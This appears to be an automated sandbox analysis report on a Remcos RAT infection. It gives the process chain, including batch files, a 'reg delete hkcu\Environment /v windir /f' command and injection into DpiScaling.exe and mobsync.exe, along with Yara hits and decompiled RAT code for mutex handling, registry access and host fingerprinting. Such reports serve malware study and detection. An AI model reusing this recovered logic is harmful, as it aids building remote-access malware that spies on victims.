Start date: 21/09/2021
Path: C:\Windows\SysWOW64\DpiScaling.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\DpiScaling.exe
Imagebase: 0xb30000
File size: 77312 bytes
MD5 hash: 302B1BBDBF4D96BEE99C6B45680CEB5E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Author: unknown
Reputation: moderate

                                  General

Start time: 22:15:24
Start date: 21/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Imagebase: 0x870000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                  General

Start time: 22:15:24
Start date: 21/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                  General

Start time: 22:15:25
Start date: 21/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Imagebase: 0x870000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                  General

Start time: 22:15:25
Start date: 21/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                  General

Start time: 22:15:25
Start date: 21/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Imagebase: 0x870000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                  General

Start time: 22:15:26
Start date: 21/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                  General

Start time: 22:15:26
Start date: 21/09/2021
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg delete hkcu\Environment /v windir /f
Imagebase: 0x11a0000
File size: 59392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                  General

Start time: 22:15:27
Start date: 21/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                  General

Start time: 22:15:27
Start date: 21/09/2021
Path: C:\Users\Public\Libraries\Srakjle\Srakjle.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
Imagebase: 0x400000
File size: 1133568 bytes
MD5 hash: CF98D2D4D4555323842C8371DB09347E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 13%, ReversingLabs

                                  General

Start time: 22:15:36
Start date: 21/09/2021
Path: C:\Users\Public\Libraries\Srakjle\Srakjle.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
Imagebase: 0x400000
File size: 1133568 bytes
MD5 hash: CF98D2D4D4555323842C8371DB09347E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi

                                  General

Start time: 22:15:58
Start date: 21/09/2021
Path: C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\mobsync.exe
Imagebase: 0x1160000
File size: 93184 bytes
MD5 hash: 44C19378FA529DD88674BAF647EBDC3C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, Author: Joe Security

                                  General

Start time: 22:16:14
Start date: 21/09/2021
Path: C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\mobsync.exe
Imagebase: 0x1160000
File size: 93184 bytes
MD5 hash: 44C19378FA529DD88674BAF647EBDC3C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, Author: Joe Security
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, Author: unknown

                                  Disassembly

                                  Code Analysis

                                    Executed Functions

                                    C-Code - Quality: 100%
                                    			E0040CD09() {
                                    				struct HINSTANCE__* _t1;
                                    				_Unknown_base(*)()* _t2;
                                    				_Unknown_base(*)()* _t24;
                                    
                                    				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                    				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                    				 *0x46bd2c = _t2;
                                    				if(_t2 == 0) {
                                    					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                    				}
                                    				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                    				if( *0x46bd2c == 0) {
                                    					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                    				}
                                    				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                                    				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                    				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                    				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                    				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                                    				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                    				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                    				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                    				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                    				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                    				 *0x46bb04 = _t24;
                                    				return _t24;
                                    			}


                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Sept-AITAB5,00000001,0040C505), ref: 0040CD1C
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD25
                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD43
                                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD57
                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD74
                                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD88
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE00
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE14
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE28
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE39
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule$LibraryLoad
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Sept-AITAB5$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                                    • API String ID: 551388010-280768746
                                    • Opcode ID: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                                    • Instruction ID: 7f0a72ef543637f7c74f83f283374f20c8e911501c3ee670a040c0af445c8e1c
                                    • Opcode Fuzzy Hash: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                                    • Instruction Fuzzy Hash: 1F21AEA0E8135875D620BBB29C49E1B2E58DA44B95B204927F205D7191FFFCC540CEEF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 46%
                                    			E0040D0B5() {
                                    				signed int _v32;
                                    				void* _t13;
                                    				void* _t22;
                                    				signed int _t62;
                                    				void* _t64;
                                    				void* _t65;
                                    				void* _t67;
                                    
                                    				_t64 = (_t62 & 0xfffffff8) - 0x20;
                                    				while(1) {
                                    					_v32 = _v32 & 0x00000000;
                                    					_t53 = L00401F95(0x46c518); // executed
                                    					E00410885(_t10, "override",  &_v32); // executed
                                    					_t13 = _v32 - 1;
                                    					if(_t13 == 0) {
                                    						goto L5;
                                    					}
                                    					_t22 = _t13 - 1;
                                    					if(_t22 == 0) {
                                    						_push(1);
                                    						_t68 = _t64 - 0x18;
                                    						E00407350(0x46c500, _t64 - 0x18, _t53, __eflags, 0x46c500);
                                    						_push(L"pth_unenc");
                                    						L00410B4C(0x80000001, L00401EEB(E004172DA( &_v32, 0x46c518)));
                                    						L00401EF0();
                                    						_push(1);
                                    						E00402084(0x46c500, _t68 + 0x20 - 0x18, "3.2.1 Pro");
                                    						_push("v");
                                    						E00410AA7(0x46c518, L00401F95(0x46c518));
                                    						E0041015B();
                                    						ExitProcess(0);
                                    					}
                                    					_t75 = _t22 != 1;
                                    					if(_t22 != 1) {
                                    						L6:
                                    						Sleep(0xbb8); // executed
                                    						continue;
                                    					}
                                    					L0040AD84();
                                    					L5:
                                    					_push(1);
                                    					_t65 = _t64 - 0x18;
                                    					E00407350(0x46c500, _t65, _t53, _t75, 0x46c500);
                                    					_push(L"pth_unenc");
                                    					L00410B4C(0x80000001, L00401EEB(E004172DA( &_v32, 0x46c518)));
                                    					L00401EF0();
                                    					_push(1);
                                    					_t67 = _t65 + 0x20 - 0x18;
                                    					E00402084(0x46c500, _t67, "3.2.1 Pro");
                                    					_push("v");
                                    					E00410AA7(0x46c518, L00401F95(0x46c518));
                                    					_t64 = _t67 + 0x20;
                                    					goto L6;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                                      • Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                                      • Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE
                                    • Sleep.KERNELBASE(00000BB8), ref: 0040D169
                                    • ExitProcess.KERNEL32 ref: 0040D1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 3.2.1 Pro$override$pth_unenc
                                    • API String ID: 2281282204-2083519672
                                    • Opcode ID: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
                                    • Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
                                    • Opcode Fuzzy Hash: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
                                    • Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E0042E5CA(HCRYPTPROV* __ecx, BYTE* __edx, int _a4) {
                                    				int _t2;
                                    				void* _t6;
                                    				BYTE* _t9;
                                    				long** _t10;
                                    
                                    				_t10 = __ecx;
                                    				_t9 = __edx;
                                    				_t2 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
                                    				if(_t2 != 0) {
                                    					if(CryptGenRandom( *_t10, _a4, _t9) != 0) {
                                    						CryptReleaseContext( *_t10, 0);
                                    						return 0;
                                    					}
                                    					_push(0xffffff98);
                                    					L2:
                                    					_pop(_t6);
                                    					return _t6;
                                    				}
                                    				_push(0xffffff99);
                                    				goto L2;
                                    			}

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
                                    • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    • Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                                    • Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
                                    • Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                                    • Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E00416D9E(void* __ecx, void* __edi, void* __eflags) {
                                    				char _v8;
                                    				long _v12;
                                    				char _v36;
                                    				char _v60;
                                    				char _v92;
                                    				short _v604;
                                    				void* _t26;
                                    				void* _t38;
                                    				void* _t39;
                                    
                                    				_t39 = __eflags;
                                    				_v8 = 0x10;
                                    				_t38 = __ecx;
                                    				 *0x46beb0(1,  &_v92,  &_v8); // executed
                                    				_v12 = 0x100;
                                    				GetUserNameW( &_v604,  &_v12); // executed
                                    				E004030A6(_t26, _t38, E00404405(_t26,  &_v36,  &_v92, _t39, E0040427F(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
                                    				L00401EF0();
                                    				L00401EF0();
                                    				return _t38;
                                    			}

                                    APIs
                                    • GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
                                    • GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Name$ComputerUser
                                    • String ID:
                                    • API String ID: 4229901323-0
                                    • Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                                    • Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
                                    • Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                                    • Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: recv
                                    • String ID:
                                    • API String ID: 1507349165-0
                                    • Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                                    • Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
                                    • Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                                    • Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                                    • Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
                                    • Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
                                    				char _v524;
                                    				char _v700;
                                    				char _v720;
                                    				char _v724;
                                    				char _v728;
                                    				char _v744;
                                    				char _v756;
                                    				char _v760;
                                    				char _v772;
                                    				struct _SECURITY_ATTRIBUTES* _v776;
                                    				signed int _v780;
                                    				char _v784;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t71;
                                    				void* _t78;
                                    				void** _t86;
                                    				void* _t90;
                                    				CHAR* _t93;
                                    				long _t95;
                                    				int _t97;
                                    				char _t100;
                                    				void* _t101;
                                    				void* _t105;
                                    				void* _t121;
                                    				void* _t122;
                                    				void* _t129;
                                    				char _t135;
                                    				char* _t137;
                                    				signed char* _t139;
                                    				signed char* _t141;
                                    				void* _t144;
                                    				void* _t146;
                                    				void* _t160;
                                    				void* _t163;
                                    				intOrPtr _t165;
                                    				void* _t166;
                                    				intOrPtr _t182;
                                    				intOrPtr* _t185;
                                    				void* _t187;
                                    				void* _t193;
                                    				char* _t196;
                                    				void* _t199;
                                    				char* _t203;
                                    				void* _t210;
                                    				signed short* _t214;
                                    				void* _t215;
                                    				void* _t216;
                                    				signed int _t217;
                                    				CHAR* _t224;
                                    				void* _t226;
                                    				char* _t229;
                                    				char* _t231;
                                    				intOrPtr* _t233;
                                    				void* _t235;
                                    				intOrPtr* _t240;
                                    				intOrPtr* _t244;
                                    				void* _t246;
                                    				void* _t254;
                                    				void* _t265;
                                    				void* _t268;
                                    				struct _SECURITY_ATTRIBUTES* _t269;
                                    				int _t272;
                                    				char* _t360;
                                    				signed int _t382;
                                    				signed int _t386;
                                    				int _t388;
                                    				signed int _t394;
                                    				signed int _t397;
                                    				intOrPtr _t423;
                                    				void* _t433;
                                    				void* _t435;
                                    				signed int _t452;
                                    				void* _t455;
                                    				char* _t461;
                                    				void* _t462;
                                    				char* _t465;
                                    				void* _t467;
                                    				void* _t472;
                                    				char* _t477;
                                    				intOrPtr* _t481;
                                    				void* _t484;
                                    				void* _t485;
                                    				void* _t486;
                                    				signed int _t492;
                                    				void* _t495;
                                    				void* _t496;
                                    				void* _t497;
                                    				void* _t499;
                                    				void* _t501;
                                    				void* _t502;
                                    				void* _t506;
                                    
                                    				_t444 = __edx;
                                    				 *0x46bd28 = _a4;
                                    				_push(_t268);
                                    				L0040CC55( &_v724, __edx, __eflags);
                                    				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
                                    				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
                                    				_t496 = _t495 - 0x18;
                                    				E004020EC(_t268, _t496, __edx, __eflags,  &_v728); // executed
                                    				_t71 = E00417478( &_v756, __edx);
                                    				_t497 = _t496 + 0x30;
                                    				E0040D458(__edx, _t71);
                                    				L00401E74( &_v760, __edx);
                                    				_t284 = _a12;
                                    				if( *_a12 != 0x2d) {
                                    					L6:
                                    					_t461 = 0x46c578;
                                    					__eflags =  *((char*)(L00401F95(L00401E49(0x46c578, _t444, __eflags, 3))));
                                    					 *0x46bb01 = __eflags != 0;
                                    					_t78 = E00405343(_t268,  &_v756, L004075E6( &_v780, "Software\\", __eflags, L00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
                                    					_t471 = 0x46c518;
                                    					L00401FD1(0x46c518, _t77, 0x46c518, _t78);
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00405A0B(_t268, 0x46c5cc, "Exe");
                                    					_t269 = 0;
                                    					L00401E49(0x46c578, _t77, __eflags, 0x32);
                                    					__eflags =  *(E00405220(0));
                                    					 *0x46bd4e = __eflags != 0;
                                    					L00401E49(0x46c578, _t77, __eflags, 0x33);
                                    					_t86 = E00405220(0);
                                    					__eflags =  *_t86;
                                    					 *0x46bd4f =  *_t86 != 0;
                                    					__eflags =  *0x46bd4e - _t269; // 0x0
                                    					if(__eflags == 0) {
                                    						L8:
                                    						_v776 = _t269;
                                    						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
                                    						__eflags = _t472;
                                    						if(_t472 != 0) {
                                    							WaitForSingleObject(_t472, 0xea60);
                                    							CloseHandle(_t472);
                                    						}
                                    						_t447 = L00401F95(0x46c518); // executed
                                    						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
                                    						__eflags = _t90;
                                    						if(__eflags != 0) {
                                    							_t447 = L00401F95(0x46c518);
                                    							L00410CE2(_t259, __eflags, "Inj");
                                    						}
                                    						L00401FAD(0x46c548, L00401E49(_t461, _t447, __eflags, 0xe));
                                    						_t93 = L00401F95(0x46c548);
                                    						_t462 = 0;
                                    						_t272 = 1;
                                    						CreateMutexA(0, 1, _t93); // executed
                                    						_t95 = GetLastError();
                                    						__eflags = _t95 - 0xb7;
                                    						if(_t95 == 0xb7) {
                                    							L45:
                                    							L00401FC7();
                                    							_t97 = _t272;
                                    							goto L5;
                                    						} else {
                                    							E0040CD09();
                                    							GetModuleFileNameW(0, "C:\Windows\SysWOW64\DpiScaling.exe", 0x104);
                                    							_t100 = L00417614(0x46c548);
                                    							_push(0x46c548);
                                    							_t448 = 0x80000002;
                                    							 *0x46beb4 = _t100;
                                    							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                                    							_t499 = _t497 + 0xc;
                                    							L00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
                                    							L00401FC7();
                                    							__eflags =  *0x46beb4;
                                    							if( *0x46beb4 == 0) {
                                    								_push(" (32 bit)");
                                    							} else {
                                    								_push(" (64 bit)");
                                    							}
                                    							L00405A02(_t272, 0x46c5b4, _t462);
                                    							_t105 =  *0x46bd20;
                                    							__eflags = _t105;
                                    							if(_t105 != 0) {
                                    								 *0x46a9d0 =  *_t105();
                                    							}
                                    							_t477 = 0x46c578;
                                    							__eflags = _v776 - _t462;
                                    							if(__eflags == 0) {
                                    								_t433 = L00401E49(0x46c578, _t448, __eflags, 0x2e);
                                    								__eflags =  *((char*)(L00401F95(_t433)));
                                    								if(__eflags != 0) {
                                    									__eflags =  *0x46bd20 - _t462; // 0x74cce630
                                    									if(__eflags != 0) {
                                    										__eflags =  *0x46a9d0 - _t462; // 0x1
                                    										if(__eflags == 0) {
                                    											_t448 = L00401F95(0x46c518);
                                    											_t254 = L0041083B(0x46c518, _t253, "origmsc");
                                    											_pop(_t435);
                                    											__eflags = _t254;
                                    											if(__eflags == 0) {
                                    												L00405F77(_t272, _t435, _t448);
                                    											}
                                    										} else {
                                    											_push(_t433);
                                    											_push(_t433);
                                    											__eflags = L0040A713() - 0xffffffff;
                                    											if(__eflags == 0) {
                                    												E00406071(__eflags);
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 0x27))));
                                    							if(__eflags != 0) {
                                    								E0040D3F7();
                                    							}
                                    							L00409DC9(_t272, 0x46c4e8, L00401F95(L00401E49(_t477, _t448, __eflags, 0xb)));
                                    							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 4))));
                                    							 *0x46bb02 = __eflags != 0;
                                    							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 5))));
                                    							 *0x46bafb = __eflags != 0;
                                    							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 8))));
                                    							 *0x46bb00 = __eflags != 0;
                                    							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 3))));
                                    							if(__eflags != 0) {
                                    								_t240 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x30));
                                    								_t25 = _t240 + 2; // 0x2
                                    								_t448 = _t25;
                                    								do {
                                    									_t423 =  *_t240;
                                    									_t240 = _t240 + 2;
                                    									__eflags = _t423 - _t462;
